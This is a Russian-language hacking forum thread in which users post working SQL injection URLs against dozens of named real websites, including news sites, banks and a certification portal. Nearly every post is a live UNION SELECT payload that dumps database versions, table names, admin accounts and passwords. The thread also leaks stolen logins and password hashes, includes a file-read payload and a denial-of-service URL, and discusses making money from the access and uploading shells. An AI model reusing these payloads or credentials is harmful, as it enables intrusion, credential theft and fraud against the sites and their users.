2-=lebed=- http://www.webmasters.org/ Здесь всё работает.................................... Code: http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,concat(admin_name,char(58),pwd,char(58),id),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+sbwmd_admin/* Админка: Code: http://www.webmasters.org/scripts/siteadmin/ admin:webmasters666:1
__Т__ НоВ Code: http://www.ntv.ru/corp/press/index.jsp?what=News&id=119720/**/and/**/(select/**/1/**/from/**/sys.dual)=1-- фильтруются пробелы, "$" и возможно другие символы на самом деле инъекций там много, просто привел пример одной из них может можно провести (почти уверен) инъекцию с помощью union select , но 56 раз null писать мне незахотелось
Румыния. Продолжаем... zf.ro Code: http://www.zf.ro/articol.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* 5.0.21-log:zf:[email protected] Открытых таб не много, из них: Code: adminuserright adminuserdomains adminuser adminroleview adminrole active_users adminview Поля в adminuser: Code: adminuser_uname adminuser_name adminuser_password adminuser_level adminuser_role Некоторые данные из неё (uname : name : password): Code: mirela:mirela:marinela vlad:Vlad Nicolaescu:samsung Radu24:Radu ZF 24:zf24 elisa.mitroiu:Elisa Mitroiu:elemit anca.teodorescu:Anca Teodorescu и др. Админка здесь _http://www.zf.ro/admin/, но зайти не получилось magazinulprogresiv.ro Code: http://www.magazinulprogresiv.ro/stiri.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9/* 5.0.27-standard:trtro_mp:trtro_adminmp@localhost 30 таблиц - и ни одной интересной... Разве что таба guestbook с сочитанием полей g_name и g_email impreuna.arts.ro Code: http://www.impreuna.arts.ro/articol.php?limba=1&id_articol=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/* 4.1.22-standard-log:impreuna_impreuna:impreuna_root@localhost efoto.ro Code: http://www.efoto.ro/articol.php?a=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10/* 4.1.22-standard-log:efoto_db:efoto_efoto@localhost badorgood.com Code: http://www.badorgood.com/detailn.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22-standard-log:bog_BOG:bog_bog@localhost parerea.com Code: http://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/* 4.1.22-standard : parereac_wrdp1 : parereac@localhost
СПОРТ\\\ телеканал Code: http://news.sportbox.ru/Vidy_sporta/billiard/results?browseCueist=340/**/union/*'*/select/**/1,TABLE_NAME,null,null,null,null,null,1,1,null,1,null,null%20from/**/INFORMATION_SCHEMA.TABLES-- Инъекция в POSTGRE открываем ссылку, смотрим исходный код страницы, видим имена всех таблиц
Румыния colectzii.ro Code: http://www.colectzii.ro/wiki.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 5.0.45-community-log:colectzi_main:colectzi_Robert@localhost 78 таблиц: Code: http://www.colectzii.ro/wiki.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+77,1/* Заинтересовали табы: Code: Emailz Users UsersIPs UsersHideLics В табе Users 50(!) полей: Code: ID,UserName,Psw,Email,Tel,DataNasterii,Oras,Adr1,Adr2,IP,LastLogin,Activated,Vanzari,Cumparari,DataCrearii,Nume,Prenume,Newsletter,ConfirmationCode,MSN,Y,ICQ,Profesie,Interese,Personal,Imagine,Level,Viewed,PunctePlus,PuncteMinus,Tokens,ReLic,ReLicSendMail,Recs,RecsLeft,LastVisit,PrevLogin,LastBirthdayMail,BlockMinNegativeEvals,IsOK,Web,WishWeb,NewMail,NewMailCode,WishOK,ChPswCode,Banned,ShowOnlyOK,AllowOnlyOK,PayPal Админка здесь _http://www.colectzii.ro/login.php Админы (логин:пасс): Code: Robert : bobi Albert : stiutotul
Сайт http://www.certification.ru Он же http://www.mcp.ru , http://www.ccna.ru , http://www.ccnp.ru , http://www.cna.ru , http://www.cne.ru и http://www.mcsd.ru. http://www.certification.ru/cgi-bin/userinfo.cgi?x_offset=20'&x_limit=20&fio=&email=&nick=&certs=&city= http://www.mcp.ru/labmarket/searchresult.html?type=resu'me&scheme=sea_lab&sal1=&sal2=&ospeciality=&city=&ocity=&spec= http://www.mcp.ru/labmarket/fullvacancy.html?id=10662+AND+VERSION()+like+'%' и т.д. подбором... Версия "мускула": 4.1.14 Имя БД: certification Имя пользователя БД: cert_localhost В БД есть таблицы users и moderators. Таблица users содержит поля: id, fio, login, city, nick, sex, url, icq, showemail, sendemail, birth, pos, workplace, certs. Таблица moderators содержит поля: email, id, city, url. Модераторские аккаунты: Code: [email protected]:assa [email protected]:JdsBPsQ Просто "блатные" аккаунты: Code: [email protected]:lenka [email protected]:DPSrq]pH?7N({XRm>*7C [email protected]:q http://www.mcp.ru/cgi-bin/forum.cgi?action=thread&id=26348+OR+1 - DOS-атака, сервак ложится надолго http://www.mcp.ru/admin/ - Админка
Румыния 4x4.ro Code: http://www.4x4.ro/index-articol.php?sc=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/* 5.0.37:fourx4:dvautomedia@localhost 81 таблица: Code: http://www.4x4.ro/index-articol.php?sc=-1+union+select+1,2,table_name++from+information_schema.tables+limit+80,1/* Наши таблицы: Code: pre_forum_user gal2_User useri Поля таблицы useri: Code: email,login,parola,admin Админ (логин:пасс): Code: body00:parola
http://www.sportfinder.ru/show_sites.php?query_type=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3/* 4.0.27-log/wushu/[email protected] ------------------------------------------------------------------- sportal.by http://sportal.by/menu.php?form_id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user())/* 5.0.22-Debian_2-log/sportalby/sportalby@localhost http://sportal.by/menu.php?form_id=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_icq)+from+phpbb_users+limit+1,1/* логин/хеш/уин admin/828a4b79b3ad488d3181abe23c44e7d2/
http://www.spylog.ru/ http://dir.spylog.ru/index1.phtml?group=5480%20and%201=5%20union%20select%201%20from%20mysql.user/* все, что нашел.. таблица rating.sites поля id, name, url, descr если кто чего еще найдет, отпишитесь, есть некоторые соображения..в плане выжимки бабла с этого сраного спайлога.
Code: http://mosdor.ru/?item&id=-3/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(version(),0x3a,database(),0x3a,user()),23,24,25,26,27,28,29,30,31/* db_andred_4:[email protected]
Code: http://www.[COLOR=Olive]turistor.ro[/COLOR]/art/articol.php?id=-7+union+select+1,2,3,4,concat_ws(char(58,58),user(),database(),version()),6,7,8,9,10/* ovidiuc@localhost::turistor::5.0.32-Debian_7etch1-log Нашёл таблицу membri, дальше не раскручивал.
http://www.citroen-club.kiev.ua/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user())/* 4.1.22/cit ----------------------------------------------------------------------------- http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9/* 5.0.44-log/news/infonet@localhost http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,uname,passwd),3,4,5,6,7,8,9+from+admin+limit+0,1/* логин/пароль master/newsbase + еще 6 юзеров
Румыния semneparticulare.ro Code: http://www.semneparticulare.ro/index.php?catid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9/*&catname=Editorial 4.1.22-standard-log:semnepar_ziar:semnepar_semnepa@localhost linkmagazine.ro Code: http://www.linkmagazine.ro/articol.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10/* 4.1.22-standard-log:linkmag_linkmag:linkmag_linkmag@localhost garsonieraluimaruta.ro Code: http://www.garsonieraluimaruta.ro/invitatilist.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7/* 4.1.22-standard:garson_main:garson_main@localhost saloane.ro Code: http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/* 5.0.24a-standard-log:saloane:[email protected] 24 открытых таблицы: Code: http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+limit+23,1/* ... и ни одной интересной сайт админят скорее всего по фтп: ftp.saloane.ro
http://maxitour.ru/hotels?id=-311%20union%20select%201,2,3,4,5,6,7,8,9,10,11,passw,13,14,15,16,17,18,19,20,21,22%20from%20users%20/* все понятно без слов.. пароль расшифруется в три минуты.. а равен он логину..а логин макситурс вроде http://www.newkenigsberg.ru/index.php?change=-21%20union%20select%201,2,3,concat(login,char(47),password,char(47),admin,char(47),Admtm,char(47),photo,char(47),Email,char(47),info,char(47),phone,char(47),address,char(47),anons),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,33,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48%20from%20auth_user/* мускул пятый..все на экране...сайт издательского дома еврорубль..в калининграде газэнергопромбанк.. не знаю кто как.. http://www.geprobank.ru/press/banknews/?article=-1959%20union%20select%201,2,3,4,5,6,table_name,8,table_schema,10,11,12%20from%20information_schema.tables%20limit%2015,1/* пятый мускул..таблицы наружу..чет смыкал смыкмал..ничего интересного ен насмыкал..пишите. http://mkb.ru/about_bank/work/vacancy.php?id=31%20AND%201=3%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT(column_name,0x71),0x71),4,5,6,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name='users'%20AND%20table_schema='struct'%20limit%201,1/* московский кредитный банк.. да защита у банков нынче никакая..еще с менатепа все начинал.. есть две или три таблицы юзерз ..правда инфа в них разнаю.. бд с инфой о юзерах онлайн банкинга находится на другом серваке..пролезть не удалось, если кто откроет новые просторы для боевых действий, просьба отписаться.. вот тут прикольно ..уралвеб..почта! http://www.uralweb.ru/tourism/index.php?region_sel=all&tour_sel=-4%20UNION%20select%201,2,table_name,4,5,6,7,8,9%20from%20information_schema.tables%20/*&place=47 есть бд mail..там чет типа аккаунтс или мемберс..ну найти легко, опять же пятый мускул ..смотрим имена таблиц и полей.. находим почтовик с открытыми паролями..юзаем кто кому как надо.. залить шел так и не получилось..
http://www.shsb.ru/seminar.php?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/* 4.1.20/nshp/nshp@localhost ----------------------------------------------------------------- rus.srbc.ru http://rus.srbc.ru/home.asp?artId=-1+or+1=@@version-- Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) Mar 3 2007 18:40:02 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+user)-- all_from_web http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+db_name())-- BusinessClub http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+top+1+table_name+from+information_schema.tables)-- В таблицах не копался
www.theblocparty.org Code: _http://www.theblocparty.org/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* www.onlyfabrics.com Code: _http://www.onlyfabrics.com/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ЗЫ подробно о скуле в AlstraSoft E-Friends читаем тут: https://forum.antichat.ru/thread54157.html
Code: http://www.[COLOR=Magenta]cgc onn.com[/COLOR]/content/article.php?id=-77'+union+select+1,2,user,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user/* Интересный логин-pma,логинимся в http://www.cgc onn.com/phpmyadmin под логином pma без пасса) Code: http://www.cgc onn.com/content/article.php?id=-77'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables/* Таблицы хранятся в другой бд,юзаем переход через точку Определяем БД Code: http://www.cgcon n.com/content/article.php?id=-77'+union+select+1,2,table_schema,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_name='users'/* Code: http://www.cg conn.com/content/article.php?id=-77'+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+parts.users+limit+1,10/* Code: http://www.cgco nn.com/content/article.php?id=-77'+union+select+1,2,concat(name,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+webauth.user_pwd/* и т.д и т.п
Снова скулы хренпроссышь что за контора - админка /admin/ http://abvgroup.ru/part.php?id=-1%20union%20select%20login,password%20from%20users%20/* вот думал бабла надыбать помелочи..нашел скулу.. http://sportingbet.enetpulse.com/?g=ts&stats=true&sid=2007&lid=-5%20union%20select%201,2,LOAD_FILE(char(47,104,111,109,101,47,109,105,110,105,115,105,116,101,115,47,115,112,111,114,116,105,110,103,98,101,116,46,101,110,101,116,112,117,108,115,101,46,99,111,109,47,116,115,95,115,116,97,116,115,46,112,104,112)),4,5,6,7,8,9,10,11%20from%20mysql.user/*мож кто допетрит.. клубинка какая-то ..впадлу пасы декодить ... http://www.clubinka.ru/release.php?rdl=6%20AND%201=19%20union%20select%201,2,3,AES_DECRYPT(AES_ENCRYPT(login,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),6,7,8,9%20from%20admin%20/* http://www.toptur.ru/?pp=&cat=-73'%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4/* софт какой-то ...да пох какой софт.. таблиц не нашел http://nextaz.com/showsoft.php?id=-8247%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12%20/*
